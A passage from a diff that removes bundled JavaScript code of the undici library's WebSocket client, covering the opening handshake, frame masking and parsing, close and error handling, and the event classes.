request.headersList.get('Sec-WebSocket-Protocol')) { - failWebsocketConnection(ws, 'Protocol was not set in the opening handshake.') - return - } - - response.socket.on('data', onSocketData) - response.socket.on('close', onSocketClose) - response.socket.on('error', onSocketError) - - if (channels.open.hasSubscribers) { - channels.open.publish({ - address: response.socket.address(), - protocol: secProtocol, - extensions: secExtension - }) - } - - onEstablish(response) - } - }) - - return controller -} - -/** - * @param {Buffer} chunk - */ -function onSocketData (chunk) { - if (!this.ws[kByteParser].write(chunk)) { - this.pause() - } -} - -/** - * @see https://websockets.spec.whatwg.org/#feedback-from-the-protocol - * @see https://datatracker.ietf.org/doc/html/rfc6455#section-7.1.4 - */ -function onSocketClose () { - const { ws } = this - - // If the TCP connection was closed after the - // WebSocket closing handshake was completed, the WebSocket connection - // is said to have been closed _cleanly_. - const wasClean = ws[kSentClose] && ws[kReceivedClose] - - let code = 1005 - let reason = '' - - const result = ws[kByteParser].closingInfo - - if (result) { - code = result.code ?? 1005 - reason = result.reason - } else if (!ws[kSentClose]) { - // If _The WebSocket - // Connection is Closed_ and no Close control frame was received by the - // endpoint (such as could occur if the underlying transport connection - // is lost), _The WebSocket Connection Close Code_ is considered to be - // 1006. - code = 1006 - } - - // 1. Change the ready state to CLOSED (3). - ws[kReadyState] = states.CLOSED - - // 2. If the user agent was required to fail the WebSocket - // connection, or if the WebSocket connection was closed - // after being flagged as full, fire an event named error - // at the WebSocket object. - // TODO - - // 3. Fire an event named close at the WebSocket object, - // using CloseEvent, with the wasClean attribute - // initialized to true if the connection closed cleanly - // and false otherwise, the code attribute initialized to - // the WebSocket connection close code, and the reason - // attribute initialized to the result of applying UTF-8 - // decode without BOM to the WebSocket connection close - // reason. - fireEvent('close', ws, CloseEvent, { - wasClean, code, reason - }) - - if (channels.close.hasSubscribers) { - channels.close.publish({ - websocket: ws, - code, - reason - }) - } -} - -function onSocketError (error) { - const { ws } = this - - ws[kReadyState] = states.CLOSING - - if (channels.socketError.hasSubscribers) { - channels.socketError.publish(error) - } - - this.destroy() -} - -module.exports = { - establishWebSocketConnection -} - - -/***/ }), - -/***/ 9188: -/***/ ((module) => { - -"use strict"; - - -// This is a Globally Unique Identifier unique used -// to validate that the endpoint accepts websocket -// connections. -// See https://www.rfc-editor.org/rfc/rfc6455.html#section-1.3 -const uid = '258EAFA5-E914-47DA-95CA-C5AB0DC85B11' - -/** @type {PropertyDescriptor} */ -const staticPropertyDescriptors = { - enumerable: true, - writable: false, - configurable: false -} - -const states = { - CONNECTING: 0, - OPEN: 1, - CLOSING: 2, - CLOSED: 3 -} - -const opcodes = { - CONTINUATION: 0x0, - TEXT: 0x1, - BINARY: 0x2, - CLOSE: 0x8, - PING: 0x9, - PONG: 0xA -} - -const maxUnsigned16Bit = 2 ** 16 - 1 // 65535 - -const parserStates = { - INFO: 0, - PAYLOADLENGTH_16: 2, - PAYLOADLENGTH_64: 3, - READ_DATA: 4 -} - -const emptyBuffer = Buffer.allocUnsafe(0) - -module.exports = { - uid, - staticPropertyDescriptors, - states, - opcodes, - maxUnsigned16Bit, - parserStates, - emptyBuffer -} - - -/***/ }), - -/***/ 2611: -/***/ ((module, __unused_webpack_exports, __nccwpck_require__) => { - -"use strict"; - - -const { webidl } = __nccwpck_require__(1744) -const { kEnumerableProperty } = __nccwpck_require__(3983) -const { MessagePort } = __nccwpck_require__(1267) - -/** - * @see https://html.spec.whatwg.org/multipage/comms.html#messageevent - */ -class MessageEvent extends Event { - #eventInit - - constructor (type, eventInitDict = {}) { - webidl.argumentLengthCheck(arguments, 1, { header: 'MessageEvent constructor' }) - - type = webidl.converters.DOMString(type) - eventInitDict = webidl.converters.MessageEventInit(eventInitDict) - - super(type, eventInitDict) - - this.#eventInit = eventInitDict - } - - get data () { - webidl.brandCheck(this, MessageEvent) - - return this.#eventInit.data - } - - get origin () { - webidl.brandCheck(this, MessageEvent) - - return this.#eventInit.origin - } - - get lastEventId () { - webidl.brandCheck(this, MessageEvent) - - return this.#eventInit.lastEventId - } - - get source () { - webidl.brandCheck(this, MessageEvent) - - return this.#eventInit.source - } - - get ports () { - webidl.brandCheck(this, MessageEvent) - - if (!Object.isFrozen(this.#eventInit.ports)) { - Object.freeze(this.#eventInit.ports) - } - - return this.#eventInit.ports - } - - initMessageEvent ( - type, - bubbles = false, - cancelable = false, - data = null, - origin = '', - lastEventId = '', - source = null, - ports = [] - ) { - webidl.brandCheck(this, MessageEvent) - - webidl.argumentLengthCheck(arguments, 1, { header: 'MessageEvent.initMessageEvent' }) - - return new MessageEvent(type, { - bubbles, cancelable, data, origin, lastEventId, source, ports - }) - } -} - -/** - * @see https://websockets.spec.whatwg.org/#the-closeevent-interface - */ -class CloseEvent extends Event { - #eventInit - - constructor (type, eventInitDict = {}) { - webidl.argumentLengthCheck(arguments, 1, { header: 'CloseEvent constructor' }) - - type = webidl.converters.DOMString(type) - eventInitDict = webidl.converters.CloseEventInit(eventInitDict) - - super(type, eventInitDict) - - this.#eventInit = eventInitDict - } - - get wasClean () { - webidl.brandCheck(this, CloseEvent) - - return this.#eventInit.wasClean - } - - get code () { - webidl.brandCheck(this, CloseEvent) - - return this.#eventInit.code - } - - get reason () { - webidl.brandCheck(this, CloseEvent) - - return this.#eventInit.reason - } -} - -// https://html.spec.whatwg.org/multipage/webappapis.html#the-errorevent-interface -class ErrorEvent extends Event { - #eventInit - - constructor (type, eventInitDict) { - webidl.argumentLengthCheck(arguments, 1, { header: 'ErrorEvent constructor' }) - - super(type, eventInitDict) - - type = webidl.converters.DOMString(type) - eventInitDict = webidl.converters.ErrorEventInit(eventInitDict ?? {}) - - this.#eventInit = eventInitDict - } - - get message () { - webidl.brandCheck(this, ErrorEvent) - - return this.#eventInit.message - } - - get filename () { - webidl.brandCheck(this, ErrorEvent) - - return this.#eventInit.filename - } - - get lineno () { - webidl.brandCheck(this, ErrorEvent) - - return this.#eventInit.lineno - } - - get colno () { - webidl.brandCheck(this, ErrorEvent) - - return this.#eventInit.colno - } - - get error () { - webidl.brandCheck(this, ErrorEvent) - - return this.#eventInit.error - } -} - -Object.defineProperties(MessageEvent.prototype, { - [Symbol.toStringTag]: { - value: 'MessageEvent', - configurable: true - }, - data: kEnumerableProperty, - origin: kEnumerableProperty, - lastEventId: kEnumerableProperty, - source: kEnumerableProperty, - ports: kEnumerableProperty, - initMessageEvent: kEnumerableProperty -}) - -Object.defineProperties(CloseEvent.prototype, { - [Symbol.toStringTag]: { - value: 'CloseEvent', - configurable: true - }, - reason: kEnumerableProperty, - code: kEnumerableProperty, - wasClean: kEnumerableProperty -}) - -Object.defineProperties(ErrorEvent.prototype, { - [Symbol.toStringTag]: { - value: 'ErrorEvent', - configurable: true - }, - message: kEnumerableProperty, - filename: kEnumerableProperty, - lineno: kEnumerableProperty, - colno: kEnumerableProperty, - error: kEnumerableProperty -}) - -webidl.converters.MessagePort = webidl.interfaceConverter(MessagePort) - -webidl.converters['sequence'] = webidl.sequenceConverter( - webidl.converters.MessagePort -) - -const eventInit = [ - { - key: 'bubbles', - converter: webidl.converters.boolean, - defaultValue: false - }, - { - key: 'cancelable', - converter: webidl.converters.boolean, - defaultValue: false - }, - { - key: 'composed', - converter: webidl.converters.boolean, - defaultValue: false - } -] - -webidl.converters.MessageEventInit = webidl.dictionaryConverter([ - ...eventInit, - { - key: 'data', - converter: webidl.converters.any, - defaultValue: null - }, - { - key: 'origin', - converter: webidl.converters.USVString, - defaultValue: '' - }, - { - key: 'lastEventId', - converter: webidl.converters.DOMString, - defaultValue: '' - }, - { - key: 'source', - // Node doesn't implement WindowProxy or ServiceWorker, so the only - // valid value for source is a MessagePort. - converter: webidl.nullableConverter(webidl.converters.MessagePort), - defaultValue: null - }, - { - key: 'ports', - converter: webidl.converters['sequence'], - get defaultValue () { - return [] - } - } -]) - -webidl.converters.CloseEventInit = webidl.dictionaryConverter([ - ...eventInit, - { - key: 'wasClean', - converter: webidl.converters.boolean, - defaultValue: false - }, - { - key: 'code', - converter: webidl.converters['unsigned short'], - defaultValue: 0 - }, - { - key: 'reason', - converter: webidl.converters.USVString, - defaultValue: '' - } -]) - -webidl.converters.ErrorEventInit = webidl.dictionaryConverter([ - ...eventInit, - { - key: 'message', - converter: webidl.converters.DOMString, - defaultValue: '' - }, - { - key: 'filename', - converter: webidl.converters.USVString, - defaultValue: '' - }, - { - key: 'lineno', - converter: webidl.converters['unsigned long'], - defaultValue: 0 - }, - { - key: 'colno', - converter: webidl.converters['unsigned long'], - defaultValue: 0 - }, - { - key: 'error', - converter: webidl.converters.any - } -]) - -module.exports = { - MessageEvent, - CloseEvent, - ErrorEvent -} - - -/***/ }), - -/***/ 5444: -/***/ ((module, __unused_webpack_exports, __nccwpck_require__) => { - -"use strict"; - - -const { maxUnsigned16Bit } = __nccwpck_require__(9188) - -/** @type {import('crypto')} */ -let crypto -try { - crypto = __nccwpck_require__(6113) -} catch { - -} - -class WebsocketFrameSend { - /** - * @param {Buffer|undefined} data - */ - constructor (data) { - this.frameData = data - this.maskKey = crypto.randomBytes(4) - } - - createFrame (opcode) { - const bodyLength = this.frameData?.byteLength ?? 0 - - /** @type {number} */ - let payloadLength = bodyLength // 0-125 - let offset = 6 - - if (bodyLength > maxUnsigned16Bit) { - offset += 8 // payload length is next 8 bytes - payloadLength = 127 - } else if (bodyLength > 125) { - offset += 2 // payload length is next 2 bytes - payloadLength = 126 - } - - const buffer = Buffer.allocUnsafe(bodyLength + offset) - - // Clear first 2 bytes, everything else is overwritten - buffer[0] = buffer[1] = 0 - buffer[0] |= 0x80 // FIN - buffer[0] = (buffer[0] & 0xF0) + opcode // opcode - - /*! ws. MIT License. Einar Otto Stangvik */ - buffer[offset - 4] = this.maskKey[0] - buffer[offset - 3] = this.maskKey[1] - buffer[offset - 2] = this.maskKey[2] - buffer[offset - 1] = this.maskKey[3] - - buffer[1] = payloadLength - - if (payloadLength === 126) { - buffer.writeUInt16BE(bodyLength, 2) - } else if (payloadLength === 127) { - // Clear extended payload length - buffer[2] = buffer[3] = 0 - buffer.writeUIntBE(bodyLength, 4, 6) - } - - buffer[1] |= 0x80 // MASK - - // mask body - for (let i = 0; i < bodyLength; i++) { - buffer[offset + i] = this.frameData[i] ^ this.maskKey[i % 4] - } - - return buffer - } -} - -module.exports = { - WebsocketFrameSend -} - - -/***/ }), - -/***/ 1688: -/***/ ((module, __unused_webpack_exports, __nccwpck_require__) => { - -"use strict"; - - -const { Writable } = __nccwpck_require__(2781) -const diagnosticsChannel = __nccwpck_require__(7643) -const { parserStates, opcodes, states, emptyBuffer } = __nccwpck_require__(9188) -const { kReadyState, kSentClose, kResponse, kReceivedClose } = __nccwpck_require__(7578) -const { isValidStatusCode, failWebsocketConnection, websocketMessageReceived } = __nccwpck_require__(5515) -const { WebsocketFrameSend } = __nccwpck_require__(5444) - -// This code was influenced by ws released under the MIT license. -// Copyright (c) 2011 Einar Otto Stangvik -// Copyright (c) 2013 Arnout Kazemier and contributors -// Copyright (c) 2016 Luigi Pinca and contributors - -const channels = {} -channels.ping = diagnosticsChannel.channel('undici:websocket:ping') -channels.pong = diagnosticsChannel.channel('undici:websocket:pong') - -class ByteParser extends Writable { - #buffers = [] - #byteOffset = 0 - - #state = parserStates.INFO - - #info = {} - #fragments = [] - - constructor (ws) { - super() - - this.ws = ws - } - - /** - * @param {Buffer} chunk - * @param {() => void} callback - */ - _write (chunk, _, callback) { - this.#buffers.push(chunk) - this.#byteOffset += chunk.length - - this.run(callback) - } - - /** - * Runs whenever a new chunk is received. - * Callback is called whenever there are no more chunks buffering, - * or not enough bytes are buffered to parse. - */ - run (callback) { - while (true) { - if (this.#state === parserStates.INFO) { - // If there aren't enough bytes to parse the payload length, etc. - if (this.#byteOffset < 2) { - return callback() - } - - const buffer = this.consume(2) - - this.#info.fin = (buffer[0] & 0x80) !== 0 - this.#info.opcode = buffer[0] & 0x0F - - // If we receive a fragmented message, we use the type of the first - // frame to parse the full message as binary/text, when it's terminated - this.#info.originalOpcode ??= this.#info.opcode - - this.#info.fragmented = !this.#info.fin && this.#info.opcode !== opcodes.CONTINUATION - - if (this.#info.fragmented && this.#info.opcode !== opcodes.BINARY && this.#info.opcode !== opcodes.TEXT) { - // Only text and binary frames can be fragmented - failWebsocketConnection(this.ws, 'Invalid frame type was fragmented.') - return - } - - const payloadLength = buffer[1] & 0x7F - - if (payloadLength <= 125) { - this.#info.payloadLength = payloadLength - this.#state = parserStates.READ_DATA - } else if (payloadLength === 126) { - this.#state = parserStates.PAYLOADLENGTH_16 - } else if (payloadLength === 127) { - this.#state = parserStates.PAYLOADLENGTH_64 - } - - if (this.#info.fragmented && payloadLength > 125) { - // A fragmented frame can't be fragmented itself - failWebsocketConnection(this.ws, 'Fragmented frame exceeded 125 bytes.') - return - } else if ( - (this.#info.opcode === opcodes.PING || - this.#info.opcode === opcodes.PONG || - this.#info.opcode === opcodes.CLOSE) && - payloadLength > 125 - ) { - // Control frames can have a payload length of 125 bytes MAX - failWebsocketConnection(this.ws, 'Payload length for control frame exceeded 125 bytes.') - return - } else if (this.#info.opcode === opcodes.CLOSE) { - if (payloadLength === 1) { - failWebsocketConnection(this.ws, 'Received close frame with a 1-byte body.') - return - } - - const body = this.consume(payloadLength) - - this.#info.closeInfo = this.parseCloseBody(false, body) - - if (!this.ws[kSentClose]) { - // If an endpoint receives a Close frame and did not previously send a - // Close frame, the endpoint MUST send a Close frame in response. (When - // sending a Close frame in response, the endpoint typically echos the - // status code it received.) - const body = Buffer.allocUnsafe(2) - body.writeUInt16BE(this.#info.closeInfo.code, 0) - const closeFrame = new WebsocketFrameSend(body) - - this.ws[kResponse].socket.write( - closeFrame.createFrame(opcodes.CLOSE), - (err) => { - if (!err) { - this.ws[kSentClose] = true - } - } - ) - } - - // Upon either sending or receiving a Close control frame, it is said - // that _The WebSocket Closing Handshake is Started_ and that the - // WebSocket connection is in the CLOSING state. - this.ws[kReadyState] = states.CLOSING - this.ws[kReceivedClose] = true - - this.end() - - return - } else if (this.#info.opcode === opcodes.PING) { - // Upon receipt of a Ping frame, an endpoint MUST send a Pong frame in - // response, unless it already received a Close frame. - // A Pong frame sent in response to a Ping frame must have identical - // "Application data" - - const body = this.consume(payloadLength) - - if (!this.ws[kReceivedClose]) { - const frame = new WebsocketFrameSend(body) - - this.ws[kResponse].socket.write(frame.createFrame(opcodes.PONG)) - - if (channels.ping.hasSubscribers) { - channels.ping.publish({ - payload: body - }) - } - } - - this.#state = parserStates.INFO - - if (this.#byteOffset > 0) { - continue - } else { - callback() - return - } - } else if (this.#info.opcode === opcodes.PONG) { - // A Pong frame MAY be sent unsolicited. This serves as a - // unidirectional heartbeat. A response to an unsolicited Pong frame is - // not expected. - - const body = this.consume(payloadLength) - - if (channels.pong.hasSubscribers) { - channels.pong.publish({ - payload: body - }) - } - - if (this.#byteOffset > 0) { - continue - } else { - callback() - return - } - } - } else if (this.#state === parserStates.PAYLOADLENGTH_16) { - if (this.#byteOffset < 2) { - return callback() - } - - const buffer = this.consume(2) - - this.#info.payloadLength = buffer.readUInt16BE(0) - this.#state = parserStates.READ_DATA - } else if (this.#state === parserStates.PAYLOADLENGTH_64) { - if (this.#byteOffset < 8) { - return callback() - } - - const buffer = this.consume(8) - const upper = buffer.readUInt32BE(0) - - // 2^31 is the maxinimum bytes an arraybuffer can contain - // on 32-bit systems. Although, on 64-bit systems, this is - // 2^53-1 bytes. - // https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Errors/Invalid_array_length - // https://source.chromium.org/chromium/chromium/src/+/main:v8/src/common/globals.h;drc=1946212ac0100668f14eb9e2843bdd846e510a1e;bpv=1;bpt=1;l=1275 - // https://source.chromium.org/chromium/chromium/src/+/main:v8/src/objects/js-array-buffer.h;l=34;drc=1946212ac0100668f14eb9e2843bdd846e510a1e - if (upper > 2 ** 31 - 1) { - failWebsocketConnection(this.ws, 'Received payload length > 2^31 bytes.') - return - } - - const lower = buffer.readUInt32BE(4) - - this.#info.payloadLength = (upper << 8) + lower - this.#state = parserStates.READ_DATA - } else if (this.#state === parserStates.READ_DATA) { - if (this.#byteOffset < this.#info.payloadLength) { - // If there is still more data in this chunk that needs to be read - return callback() - } else if (this.#byteOffset >= this.#info.payloadLength) { - // If the server sent multiple frames in a single chunk - - const body = this.consume(this.#info.payloadLength) - - this.#fragments.push(body) - - // If the frame is unfragmented, or a fragmented frame was terminated, - // a message was received - if (!this.#info.fragmented || (this.#info.fin && this.#info.opcode === opcodes.CONTINUATION)) { - const fullMessage = Buffer.concat(this.#fragments) - - websocketMessageReceived(this.ws, this.#info.originalOpcode, fullMessage) - - this.#info = {} - this.#fragments.length = 0 - } - - this.#state = parserStates.INFO - } - } - - if (this.#byteOffset > 0) { - continue - } else { - callback() - break - } - } - } - - /** - * Take n bytes from the buffered Buffers - * @param {number} n - * @returns {Buffer|null} - */ - consume (n) { - if (n > this.#byteOffset) { - return null - } else if (n === 0) { - return emptyBuffer - } - - if (this.#buffers[0].length === n) { - this.#byteOffset -= this.#buffers[0].length - return this.#buffers.shift() - } - - const buffer = Buffer.allocUnsafe(n) - let offset = 0 - - while (offset !== n) { - const next = this.#buffers[0] - const { length } = next - - if (length + offset === n) { - buffer.set(this.#buffers.shift(), offset) - break - } else if (length + offset > n) { - buffer.set(next.subarray(0, n - offset), offset) - this.#buffers[0] = next.subarray(n - offset) - break - } else { - buffer.set(this.#buffers.shift(), offset) - offset += next.length - } - } - - this.#byteOffset -= n - - return buffer - } - - parseCloseBody (onlyCode, data) { - // https://datatracker.ietf.org/doc/html/rfc6455#section-7.1.5 - /** @type {number|undefined} */ - let code - - if (data.length >= 2) { - // _The WebSocket Connection Close Code_ is - // defined as the status code (Section 7.4) contained in the first Close - // control frame received by the application - code = data.readUInt16BE(0) - } - - if (onlyCode) { - if (!isValidStatusCode(code)) { - return null - } - - return { code } - } - - // https://datatracker.ietf.org/doc/html/rfc6455#section-7.1.6 - /** @type {Buffer} */ - let reason = data.subarray(2) - - // Remove BOM - if (reason[0] === 0xEF && reason[1] === 0xBB && reason[2] === 0xBF) { - reason = reason.subarray(3) - } - - if (code !== undefined && !isValidStatusCode(code)) { - return null - } - - try { - // TODO: optimize this - reason = new TextDecoder('utf-8', { fatal: true }).decode(reason) - } catch { - return null - } - - return { code, reason } - } - - get closingInfo () { - return this.#info.closeInfo - } -} - -module.exports = { - ByteParser -} - - -/***/ }), - -/***/ 7578: -/***/ ((module) => { - -"use strict"; - - -module.exports = { - kWebSocketURL: Symbol('url'), - kReadyState: Symbol('ready state'), - kController: Symbol('controller'), - kResponse: Symbol('response'), - kBinaryType: Symbol('binary type'), - kSentClose: Symbol('sent close'), - kReceivedClose: Symbol('received close'), - kByteParser: Symbol('byte parser') -} - - -/***/ }), - -/***/ 5515: -/***/ ((module, __unused_webpack_exports, __nccwpck_require__) => { - -"use strict"; - - -const { kReadyState, kController, kResponse, kBinaryType, kWebSocketURL } = __nccwpck_require__(7578) -const { states, opcodes } = __nccwpck_require__(9188) -const { MessageEvent, ErrorEvent } = __nccwpck_require__(2611) - -/* globals Blob */ - -/** - * @param {import('./websocket').WebSocket} ws - */ -function isEstablished (ws) { - // If the server's response is validated as provided for above, it is - // said that _The WebSocket Connection is Established_ and that the - // WebSocket Connection is in the OPEN state. - return ws[kReadyState] === states.OPEN -} - -/** - * @param {import('./websocket').WebSocket} ws - */ -function isClosing (ws) { - // Upon either sending or receiving a Close control frame, it is said - // that _The WebSocket Closing Handshake is Started_ and that the - // WebSocket connection is in the CLOSING state. - return ws[kReadyState] === states.CLOSING -} - -/** - * @param {import('./websocket').WebSocket} ws - */ -function isClosed (ws) { - return ws[kReadyState] === states.CLOSED -} - -/** - * @see https://dom.spec.whatwg.org/#concept-event-fire - * @param {string} e - * @param {EventTarget} target - * @param {EventInit | undefined} eventInitDict - */ -function fireEvent (e, target, eventConstructor = Event, eventInitDict) { - // 1. If eventConstructor is not given, then let eventConstructor be Event. - - // 2. Let event be the result of creating an event given eventConstructor, - // in the relevant realm of target. - // 3. Initialize event’s type attribute to e. - const event = new eventConstructor(e, eventInitDict) // eslint-disable-line new-cap - - // 4. Initialize any other IDL attributes of event as described in the - // invocation of this algorithm. - - // 5. Return the result of dispatching event at target, with legacy target - // override flag set if set. - target.dispatchEvent(event) -} - -/** - * @see https://websockets.spec.whatwg.org/#feedback-from-the-protocol - * @param {import('./websocket').WebSocket} ws - * @param {number} type Opcode - * @param {Buffer} data application data - */ -function websocketMessageReceived (ws, type, data) { - // 1. If ready state is not OPEN (1), then return. - if (ws[kReadyState] !== states.OPEN) { - return - } - - // 2. Let dataForEvent be determined by switching on type and binary type: - let dataForEvent - - if (type === opcodes.TEXT) { - // -> type indicates that the data is Text - // a new DOMString containing data - try { - dataForEvent = new TextDecoder('utf-8', { fatal: true }).decode(data) - } catch { - failWebsocketConnection(ws, 'Received invalid UTF-8 in text frame.') - return - } - } else if (type === opcodes.BINARY) { - if (ws[kBinaryType] === 'blob') { - // -> type indicates that the data is Binary and binary type is "blob" - // a new Blob object, created in the relevant Realm of the WebSocket - // object, that represents data as its raw data - dataForEvent = new Blob([data]) - } else { - // -> type indicates that the data is Binary and binary type is "arraybuffer" - // a new ArrayBuffer object, created in the relevant Realm of the - // WebSocket object, whose contents are data - dataForEvent = new Uint8Array(data).buffer - } - } - - // 3. Fire an event named message at the WebSocket object, using MessageEvent, - // with the origin attribute initialized to the serialization of the WebSocket - // object’s url's origin, and the data attribute initialized to dataForEvent. - fireEvent('message', ws, MessageEvent, { - origin: ws[kWebSocketURL].origin, - data: dataForEvent - }) -} - -/** - * @see https://datatracker.ietf.org/doc/html/rfc6455 - * @see https://datatracker.ietf.org/doc/html/rfc2616 - * @see https://bugs.chromium.org/p/chromium/issues/detail?id=398407 - * @param {string} protocol - */ -function isValidSubprotocol (protocol) { - // If present, this value indicates one - // or more comma-separated subprotocol the client wishes to speak, - // ordered by preference. The elements that comprise this value - // MUST be non-empty strings with characters in the range U+0021 to - // U+007E not including separator characters as defined in - // [RFC2616] and MUST all be unique strings. - if (protocol.length === 0) { - return false - } - - for (const char of protocol) { - const code = char.charCodeAt(0) - - if ( - code < 0x21 || - code > 0x7E || - char === '(' || - char === ')' || - char === '<' || - char === '>' || - char === '@' || - char === ',' || - char === ';' || - char === ':' || - char === '\\' || - char === '"' || - char === '/' || - char === '[' || - char === ']' || - char === '?' || - char === '=' || - char === '{' || - char === '}' || - code === 32 || // SP - code === 9 // HT - ) { - return false - } - } - - return true -} - -/** - * @see https://datatracker.ietf.org/doc/html/rfc6455#section-7-4 - * @param {number} code - */ -function isValidStatusCode (code) { - if (code >= 1000 && code < 1015) { - return ( - code !== 1004 && // reserved - code !== 1005 && // "MUST NOT be set as a status code" - code !== 1006 // "MUST NOT be set as a status code" - ) - } - - return code >= 3000 && code <= 4999 -} - -/** - * @param {import('./websocket').WebSocket} ws - * @param {string|undefined} reason - */ -function failWebsocketConnection (ws, reason) { - const { [kController]: controller, [kResponse]: response } = ws - - controller.abort() - - if (response?.socket && !response.socket.destroyed) { - response.socket.destroy() - } - - if (reason) { - fireEvent('error', ws, ErrorEvent, { - error: new Error(reason) - }) - } -} - -module.exports = { - isEstablished, - isClosing, - isClosed, - fireEvent, - isValidSubprotocol, - isValidStatusCode, - failWebsocketConnection, - websocketMessageReceived -} - - -/***/ }), - -/***/ 4284: -/***/ ((module, __unused_webpack_exports, __nccwpck_require__) => { - -"use strict"; - - -const { webidl } = __nccwpck_require__(1744) -const { DOMException } = __nccwpck_require__(1037) -const { URLSerializer } = __nccwpck_require__(685) -const { getGlobalOrigin } = __nccwpck_require__(1246) -const { staticPropertyDescriptors, states, opcodes, emptyBuffer } = __nccwpck_require__(9188) -const { - kWebSocketURL, - kReadyState, - kController, - kBinaryType, - kResponse, - kSentClose, - kByteParser -} = __nccwpck_require__(7578) -const { isEstablished, isClosing, isValidSubprotocol, failWebsocketConnection, fireEvent } = __nccwpck_require__(5515) -const { establishWebSocketConnection } = __nccwpck_require__(5354) -const { WebsocketFrameSend } = __nccwpck_require__(5444) -const { ByteParser } = __nccwpck_require__(1688) -const { kEnumerableProperty, isBlobLike } = __nccwpck_require__(3983) -const { getGlobalDispatcher } = __nccwpck_require__(1892) -const { types } = __nccwpck_require__(3837) - -let experimentalWarned = false - -// https://websockets.spec.whatwg.org/#interface-definition -class WebSocket extends EventTarget { - #events = { - open: null, - error: null, - close: null, - message: null - } - - #bufferedAmount = 0 - #protocol = '' - #extensions = '' - - /** - * @param {string} url - * @param {string|string[]} protocols - */ - constructor (url, protocols = []) { - super() - - webidl.argumentLengthCheck(arguments, 1, { header: 'WebSocket constructor' }) - - if (!experimentalWarned) { - experimentalWarned = true - process.emitWarning('WebSockets are experimental, expect them to change at any time.', { - code: 'UNDICI-WS' - }) - } - - const options = webidl.converters['DOMString or sequence or WebSocketInit'](protocols) - - url = webidl.converters.USVString(url) - protocols = options.protocols - - // 1. Let baseURL be this's relevant settings object's API base URL. - const baseURL = getGlobalOrigin() - - // 1. Let urlRecord be the result of applying the URL parser to url with baseURL. - let urlRecord - - try { - urlRecord = new URL(url, baseURL) - } catch (e) { - // 3. If urlRecord is failure, then throw a "SyntaxError" DOMException. - throw new DOMException(e, 'SyntaxError') - } - - // 4. If urlRecord’s scheme is "http", then set urlRecord’s scheme to "ws". - if (urlRecord.protocol === 'http:') { - urlRecord.protocol = 'ws:' - } else if (urlRecord.protocol === 'https:') { - // 5. Otherwise, if urlRecord’s scheme is "https", set urlRecord’s scheme to "wss". - urlRecord.protocol = 'wss:' - } - - // 6. If urlRecord’s scheme is not "ws" or "wss", then throw a "SyntaxError" DOMException. - if (urlRecord.protocol !== 'ws:' && urlRecord.protocol !== 'wss:') { - throw new DOMException( - `Expected a ws: or wss: protocol, got ${urlRecord.protocol}`, - 'SyntaxError' - ) - } - - // 7. If urlRecord’s fragment is non-null, then throw a "SyntaxError" - // DOMException. - if (urlRecord.hash || urlRecord.href.endsWith('#')) { - throw new DOMException('Got fragment', 'SyntaxError') - } - - // 8. If protocols is a string, set protocols to a sequence consisting - // of just that string. - if (typeof protocols === 'string') { - protocols = [protocols] - } - - // 9. If any of the values in protocols occur more than once or otherwise - // fail to match the requirements for elements that comprise the value - // of `Sec-WebSocket-Protocol` fields as defined by The WebSocket - // protocol, then throw a "SyntaxError" DOMException. - if (protocols.length !== new Set(protocols.map(p => p.toLowerCase())).size) { - throw new DOMException('Invalid Sec-WebSocket-Protocol value', 'SyntaxError') - } - - if (protocols.length > 0 && !protocols.every(p => isValidSubprotocol(p))) { - throw new DOMException('Invalid Sec-WebSocket-Protocol value', 'SyntaxError') - } - - // 10. Set this's url to urlRecord. - this[kWebSocketURL] = new URL(urlRecord.href) - - // 11. Let client be this's relevant settings object. - - // 12. Run this step in parallel: - - // 1. Establish a WebSocket connection given urlRecord, protocols, - // and client. - this[kController] = establishWebSocketConnection( - urlRecord, - protocols, - this, - (response) => this.#onConnectionEstablished(response), - options - ) - - // Each WebSocket object has an associated ready state, which is a - // number representing the state of the connection. Initially it must - // be CONNECTING (0). - this[kReadyState] = WebSocket.CONNECTING - - // The extensions attribute must initially return the empty string. - - // The protocol attribute must initially return the empty string. - - // Each WebSocket object has an associated binary type, which is a - // BinaryType. Initially it must be "blob". - this[kBinaryType] = 'blob' - } - - /** - * @see https://websockets.spec.whatwg.org/#dom-websocket-close - * @param {number|undefined} code - * @param {string|undefined} reason - */ - close (code = undefined, reason = undefined) { - webidl.brandCheck(this, WebSocket) - - if (code !== undefined) { - code = webidl.converters['unsigned short'](code, { clamp: true }) - } - - if (reason !== undefined) { - reason = webidl.converters.USVString(reason) - } - - // 1. If code is present, but is neither an integer equal to 1000 nor an - // integer in the range 3000 to 4999, inclusive, throw an - // "InvalidAccessError" DOMException. - if (code !== undefined) { - if (code !== 1000 && (code < 3000 || code > 4999)) { - throw new DOMException('invalid code', 'InvalidAccessError') - } - } - - let reasonByteLength = 0 - - // 2. If reason is present, then run these substeps: - if (reason !== undefined) { - // 1. Let reasonBytes be the result of encoding reason. - // 2. If reasonBytes is longer than 123 bytes, then throw a - // "SyntaxError" DOMException. - reasonByteLength = Buffer.byteLength(reason) - - if (reasonByteLength > 123) { - throw new DOMException( - `Reason must be less than 123 bytes; received ${reasonByteLength}`, - 'SyntaxError' - ) - } - } - - // 3. Run the first matching steps from the following list: - if (this[kReadyState] === WebSocket.CLOSING || this[kReadyState] === WebSocket.CLOSED) { - // If this's ready state is CLOSING (2) or CLOSED (3) - // Do nothing. - } else if (!isEstablished(this)) { - // If the WebSocket connection is not yet established - // Fail the WebSocket connection and set this's ready state - // to CLOSING (2). - failWebsocketConnection(this, 'Connection was closed before it was established.') - this[kReadyState] = WebSocket.CLOSING - } else if (!isClosing(this)) { - // If the WebSocket closing handshake has not yet been started - // Start the WebSocket closing handshake and set this's ready - // state to CLOSING (2). - // - If neither code nor reason is present, the WebSocket Close - // message must not have a body. - // - If code is present, then the status code to use in the - // WebSocket Close message must be the integer given by code. - // - If reason is also present, then reasonBytes must be - // provided in the Close message after the status code. - - const frame = new WebsocketFrameSend() - - // If neither code nor reason is present, the WebSocket Close - // message must not have a body. - - // If code is present, then the status code to use in the - // WebSocket Close message must be the integer given by code. - if (code !== undefined && reason === undefined) { - frame.frameData = Buffer.allocUnsafe(2) - frame.frameData.writeUInt16BE(code, 0) - } else if (code !== undefined && reason !== undefined) { - // If reason is also present, then reasonBytes must be - // provided in the Close message after the status code. - frame.frameData = Buffer.allocUnsafe(2 + reasonByteLength) - frame.frameData.writeUInt16BE(code, 0) - // the body MAY contain UTF-8-encoded data with value /reason/ - frame.frameData.write(reason, 2, 'utf-8') - } else { - frame.frameData = emptyBuffer - } - - /** @type 